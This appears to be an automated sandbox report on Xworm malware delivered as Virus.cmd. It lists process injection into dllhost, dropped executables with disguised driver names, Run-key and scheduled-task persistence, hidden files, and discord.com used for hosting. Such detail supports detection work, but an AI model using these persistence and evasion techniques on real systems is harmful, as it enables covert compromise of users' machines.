Analysis Overview
SHA256: d90f45a296a620f69256791f49a794451c83192cd8244600c3e26c5cd0e16e94
Threat Level: Known bad
The file Virus.cmd was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Drops startup file
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Scheduled Task/Job: Scheduled Task
Views/modifies file attributes
Checks SCSI registry key(s)
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-06-21 17:07
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-21 17:07
Reported: 2024-06-21 17:10
Platform: win11-20240611-en
Max time kernel: 145s
Max time network: 153s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2496 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 1616 created 640 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | C:\ProgramData\x4V5.2.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Malicious.lnk | C:\ProgramData\x4V5.2.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.lnk | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SMAtMZpm.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A |
| N/A | N/A | C:\ProgramData\x4V5.2.exe | N/A |
| N/A | N/A | C:\ProgramData\x4Shellcode.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CgDFtNWD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A |
| N/A | N/A | C:\ProgramData\x4V5.2.exe | N/A |
| N/A | N/A | C:\ProgramData\x4Shellcode.exe | N/A |
| N/A | N/A | C:\Users\Admin\x4Malicious | N/A |
| N/A | N/A | C:\Users\Admin\x4Malicious | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x4Joex1.exe" | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\Malicious = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Malicious.exe" | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Malicious = "C:\\Users\\Admin\\x4Malicious" | C:\ProgramData\x4V5.2.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Malicious.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Joex1 = "C:\\ProgramData\\x4Joex1.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4Joex1.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4V5.2 = "C:\\ProgramData\\x4V5.2.exe" | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4Shellcode = "C:\\ProgramData\\x4Shellcode.exe" | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | icanhazip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\x4Joex1 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\x4Malicious | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\x4svc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx | C:\Windows\System32\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\winrm\Microsoft\Drivermapper.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\SysWOW64\winrm\Microsoft\drivermapperJoex.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\winrm\Microsoft\DriverLocator.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Malicious | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2496 set thread context of 1100 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 1616 set thread context of 2080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\System32\oobe\UserOOBEBroker.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\ImmersiveControlPanel\SystemSettings.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718989760" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 21 Jun 2024 17:09:21 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\PersistedTitleBarData\windows.immersivecontrolpanel_cw5n1h2txye = "2814749767500776" | C:\Windows\system32\ApplicationFrameHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mi | C:\Windows\Explorer.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
